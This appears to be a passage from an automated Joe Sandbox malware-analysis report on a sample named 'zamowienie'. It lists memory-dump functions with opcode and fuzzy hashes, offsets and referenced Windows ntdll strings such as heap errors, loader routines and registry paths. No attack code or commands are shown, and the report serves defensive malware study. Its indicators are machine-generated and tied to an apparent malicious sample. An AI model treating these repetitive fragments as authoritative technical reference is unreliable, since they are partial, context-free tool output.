                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                              • API String ID: 0-2586055223
                                                                                                                                              • Opcode ID: b9a1e2fa5a8dbcea085af706fdb24095159d29f0ded468ff7013d48c829c759d
                                                                                                                                              • Instruction ID: f46acb57d09a6b3b389bbb0b3c7c3ae6ff8a466105a7e567d626f8e6748e9652
                                                                                                                                              • Opcode Fuzzy Hash: b9a1e2fa5a8dbcea085af706fdb24095159d29f0ded468ff7013d48c829c759d
                                                                                                                                              • Instruction Fuzzy Hash: 7061E276205741EFE311CB64C944F677BE8EF84798F084C68E9948B3A1DB34D946CB61
                                                                                                                                              Function 34EE9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                              • API String ID: 0-1391187441
                                                                                                                                              • Opcode ID: 26e3adb0821bc28d7faf8452d5d4dd12f11b65b3129b7e979a4a4ee136e52678
                                                                                                                                              • Instruction ID: 91585f2124aef4743396882a6a5e82a3fa478a1ef88ed0b4590fe0263a2366e6
                                                                                                                                              • Opcode Fuzzy Hash: 26e3adb0821bc28d7faf8452d5d4dd12f11b65b3129b7e979a4a4ee136e52678
                                                                                                                                              • Instruction Fuzzy Hash: B831E136600224EFD705CB44CC84FAABBF8EF45760F154555E814AB292DB31ED81CF61
                                                                                                                                              Function 34F9FCDF Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                                                              • API String ID: 0-4256168463
                                                                                                                                              • Opcode ID: e47dc091142336511acb3e8f54261e7558dc8bb7347f37659af91b396eb926a1
                                                                                                                                              • Instruction ID: bd7da8692df6427d4cf082526d3673baf4e0cc072da790b5d325a5824074ba38
                                                                                                                                              • Opcode Fuzzy Hash: e47dc091142336511acb3e8f54261e7558dc8bb7347f37659af91b396eb926a1
                                                                                                                                              • Instruction Fuzzy Hash: E601F136121720EFEB19DF64C440BEAB3E9EF02664F1C489AE4019B241DA74ED86CA64
                                                                                                                                              Function 34EF7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 9611fd29abab1e271acb6bd8a2f8631535434a26c58b11330ac7e2d754026d2c
                                                                                                                                              • Instruction ID: 53470213d8381cdd7f5c9a801e0639c5b3ee41171b75d3fb4bea687f5e505f1c
                                                                                                                                              • Opcode Fuzzy Hash: 9611fd29abab1e271acb6bd8a2f8631535434a26c58b11330ac7e2d754026d2c
                                                                                                                                              • Instruction Fuzzy Hash: CB510E75E00609EFFB04DFA8CD44BAEB7B4FF04355F1546A9E401932A0EB75A906DB80
                                                                                                                                              Function 34EF1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34EF1596
                                                                                                                                              • HEAP[%wZ]: , xrefs: 34EF1712
                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34EF1728
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                              • Opcode ID: c3a4ff5e312b75ff29ea489dfa89c64621ceaeaf1444724ca1623c252f142f72
                                                                                                                                              • Instruction ID: 93ad256e7916e3fcd22b4ec4655ae0101fe9df8f1e1d0e69459369abc0d2d4f6
                                                                                                                                              • Opcode Fuzzy Hash: c3a4ff5e312b75ff29ea489dfa89c64621ceaeaf1444724ca1623c252f142f72
                                                                                                                                              • Instruction Fuzzy Hash: A3E1EF78A047499FE718CF28C850A7AFBF5EF49304F19885DE49A8B286DB35ED41CB50
                                                                                                                                              Function 34F7368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                              • API String ID: 0-2391371766
                                                                                                                                              • Opcode ID: 4c42779872b45955eabb38e0d5673deaa9bf62679a265769e8be369550c5ce2a
                                                                                                                                              • Instruction ID: ae451b34ba5550e47da707ad215703c657563582d5ccf588b6a1487eac7f8156
                                                                                                                                              • Opcode Fuzzy Hash: 4c42779872b45955eabb38e0d5673deaa9bf62679a265769e8be369550c5ce2a
                                                                                                                                              • Instruction Fuzzy Hash: 52B1ADB6605345AFF311CF54D880B5BBBE8EF44790F490C2AFA40A7290D778E846CB92
                                                                                                                                              Function 34F836EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                              • API String ID: 0-318774311
                                                                                                                                              • Opcode ID: ec0167f720335c3051f40c0e890c1c27ee096b4f104bc4acc5b5741e876b93b3
                                                                                                                                              • Instruction ID: c80748ae945cb7a71b3678486e3a309e8bd10ccd0fdf19290a8845bf4e569d36
                                                                                                                                              • Opcode Fuzzy Hash: ec0167f720335c3051f40c0e890c1c27ee096b4f104bc4acc5b5741e876b93b3
                                                                                                                                              • Instruction Fuzzy Hash: D3819CB6609345AFE311CB14C840B6AB7E8FF85750F484D2DF9889B3A0DB75D906CB62
                                                                                                                                              Function 34F77410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                              • API String ID: 0-3870751728
                                                                                                                                              • Opcode ID: 66fbe546dfd514c784d9d56e57a347cd4f1db34a361bea072d933e66604fd75a
                                                                                                                                              • Instruction ID: 1ea36b4f15df11c4798934cf0e58183871a4206bdfff6c1cf2cb2408e7e2061f
                                                                                                                                              • Opcode Fuzzy Hash: 66fbe546dfd514c784d9d56e57a347cd4f1db34a361bea072d933e66604fd75a
                                                                                                                                              • Instruction Fuzzy Hash: 21914EB4E10205DFEB14CF69C880B9DBBF1BF48354F18856AD904AB395E779A842CF94
                                                                                                                                              Function 34F2909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %$&$@
                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                              • Opcode ID: c92d700937f55cd1656cca1e2ad99d2471f149189b200d624f0f80c388618790
                                                                                                                                              • Instruction ID: 20da76b76e9d0e74a4b6496eaee50f4b681bddf8a5430a75cbbb355db65555e2
                                                                                                                                              • Opcode Fuzzy Hash: c92d700937f55cd1656cca1e2ad99d2471f149189b200d624f0f80c388618790
                                                                                                                                              • Instruction Fuzzy Hash: 55717C796093419FE304CF21C980A1BBBE9FF85658F588D1DE4AA67290D731D907CF92
                                                                                                                                              Function 34FCB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • GlobalizationUserSettings, xrefs: 34FCB834
                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 34FCB82A
                                                                                                                                              • TargetNtPath, xrefs: 34FCB82F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                              • Opcode ID: 1619495ba8941925a9a30c62367eb66c0c102a7102addf6da6abaf919ad2a3a1
                                                                                                                                              • Instruction ID: 4dd8cf50e2f55513025dd857b77a4e346935a8a84e190d1b4214d51e6b1988c3
                                                                                                                                              • Opcode Fuzzy Hash: 1619495ba8941925a9a30c62367eb66c0c102a7102addf6da6abaf919ad2a3a1
                                                                                                                                              • Instruction Fuzzy Hash: C261B17698122AAFEB30CF54DC88BDAB7B8EF14750F0505E9E508A7250C7349E85CF90
                                                                                                                                              Function 34EEF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34F4E6B3
                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 34F4E6C6
                                                                                                                                              • HEAP[%wZ]: , xrefs: 34F4E6A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                              • Opcode ID: 385753660b65f38b6a59b85e059a537f3c648396ac809ec30e1d4400919ea4b8
                                                                                                                                              • Instruction ID: 0f686f1c26e9d992f15fd133e6497e429a1c825db3cb4ecb3f812efa221dbd47
                                                                                                                                              • Opcode Fuzzy Hash: 385753660b65f38b6a59b85e059a537f3c648396ac809ec30e1d4400919ea4b8
                                                                                                                                              • Instruction Fuzzy Hash: BD51A175711744EFE312CBA4C944BAABBF8BF05344F0844A5E584CB692DB74E982CB54
                                                                                                                                              Function 34F115F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 34F5A59A
                                                                                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 34F5A589
                                                                                                                                              • LdrpCompleteMapModule, xrefs: 34F5A590
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                              • API String ID: 0-1676968949
                                                                                                                                              • Opcode ID: 271422b4d9d451e9f8d22c113ca1d82381d92f695dd4c0adada53f3bb8e6b574
                                                                                                                                              • Instruction ID: 9f3a15d4a1d4d48e64b60a8096a80238b4c2b29a50e3e77fe8a0b4cae3d0cb73
                                                                                                                                              • Opcode Fuzzy Hash: 271422b4d9d451e9f8d22c113ca1d82381d92f695dd4c0adada53f3bb8e6b574
                                                                                                                                              • Instruction Fuzzy Hash: 6951EEB9A00745DFE711DA68CA40B1A7BE8EF04794F1C0AA9E9519B6E1DB35EC42CB40
                                                                                                                                              Function 34EE758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                              • API String ID: 0-1151232445
                                                                                                                                              • Opcode ID: 74f5246717567b17065715ff580950b8ad546fa895f08041e36a1c3e7e77d22d
                                                                                                                                              • Instruction ID: 94384ba08d6db171d2e9b1b898fd1d89434f44c6f529b059d93cc26f638dbc00
                                                                                                                                              • Opcode Fuzzy Hash: 74f5246717567b17065715ff580950b8ad546fa895f08041e36a1c3e7e77d22d
                                                                                                                                              • Instruction Fuzzy Hash: 1041E2B8B00341CFEB15DA58C4817B97BA4DB01398F584DADD4858B286DF64D8C6EB61
                                                                                                                                              Function 34F216CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • LdrpAllocateTls, xrefs: 34F61B40
                                                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34F61B39
                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 34F61B4A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                              • API String ID: 0-4274184382
                                                                                                                                              • Opcode ID: ccd09a5eb4bf5bb4187fed0363ee6da19e2b3f375edea00fea0fc8036735376f
                                                                                                                                              • Instruction ID: 1022e2c52a03aed2c2ddfdc9358e3b4fad5b504b6fab816a555f9a65e3e3a561
                                                                                                                                              • Opcode Fuzzy Hash: ccd09a5eb4bf5bb4187fed0363ee6da19e2b3f375edea00fea0fc8036735376f
                                                                                                                                              • Instruction Fuzzy Hash: 27418FB5A01608EFEB15DFA8CD40BAEBBF5FF88304F088919E405A7250D775A802CF94
                                                                                                                                              Function 34FA5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-964947082
                                                                                                                                              • Opcode ID: f6357f243db663847a861a87b4af1154d456576f9656ce6dfb257121e4b0fea0
                                                                                                                                              • Instruction ID: 83ccd93896198631462dab449e0fe54d830233e8f21bef27bea9af8d0ca9b3e0
                                                                                                                                              • Opcode Fuzzy Hash: f6357f243db663847a861a87b4af1154d456576f9656ce6dfb257121e4b0fea0
                                                                                                                                              • Instruction Fuzzy Hash: 0C41BFB5611368EFE760CF549980E7A3BF9EB44318F88586DEA01AB251C630D886CF95
                                                                                                                                              Function 34F233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 34F629FE
                                                                                                                                              • Actx , xrefs: 34F233AC
                                                                                                                                              • RtlCreateActivationContext, xrefs: 34F629F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                              • Opcode ID: 3f364f27fe1da18cec4f0e34a47597dae05c029c20b73c3bd7f7b5839a624caf
                                                                                                                                              • Instruction ID: 1c4a3f9ae9d18b2d33bd5ff43a780c8e95efad9de033e6056d73ef23f3b4fe4c
                                                                                                                                              • Opcode Fuzzy Hash: 3f364f27fe1da18cec4f0e34a47597dae05c029c20b73c3bd7f7b5839a624caf
                                                                                                                                              • Instruction Fuzzy Hash: 43314276600705DFEB16DEA8D880F9B37A4EF44764F4988A9EC059F285CB78D843CB90
                                                                                                                                              Function 34F7B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 34F7B632
                                                                                                                                              • @, xrefs: 34F7B670
                                                                                                                                              • GlobalFlag, xrefs: 34F7B68F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                              • API String ID: 0-4192008846
                                                                                                                                              • Opcode ID: c5c907b23e1807cdcc47e80e2754924e6448f9e9ca7ee136091bf7816755c2a6
                                                                                                                                              • Instruction ID: dba831978d6befca6ff2ffe9a2dee53f4ca4653e94ab8a2c9d6416e897eb4525
                                                                                                                                              • Opcode Fuzzy Hash: c5c907b23e1807cdcc47e80e2754924e6448f9e9ca7ee136091bf7816755c2a6
                                                                                                                                              • Instruction Fuzzy Hash: E7313EB5D00209AFEB10DF94DC80EEEBB78EF45784F5448AEE605A7250D7749A05CBA4
                                                                                                                                              Function 34F913B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                                                                                              • API String ID: 0-1050206962
                                                                                                                                              • Opcode ID: d358c773a2db5cba16ece6570f60964ad3d3ed4c356a0d4e635435eb3496420a
                                                                                                                                              • Instruction ID: 87ef955288f3376d1fbbbdedd90e321f0227534b9c42876f34b8a1932086819b
                                                                                                                                              • Opcode Fuzzy Hash: d358c773a2db5cba16ece6570f60964ad3d3ed4c356a0d4e635435eb3496420a
                                                                                                                                              • Instruction Fuzzy Hash: 05317AB2900219EFFB11DE94CD80EEFBBBDEB49654F494875E904A7210D7349D068BA0
                                                                                                                                              Function 34F21607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 34F61A40
                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 34F61A51
                                                                                                                                              • LdrpInitializeTls, xrefs: 34F61A47
                                                                                                                                              Memory Dump Source
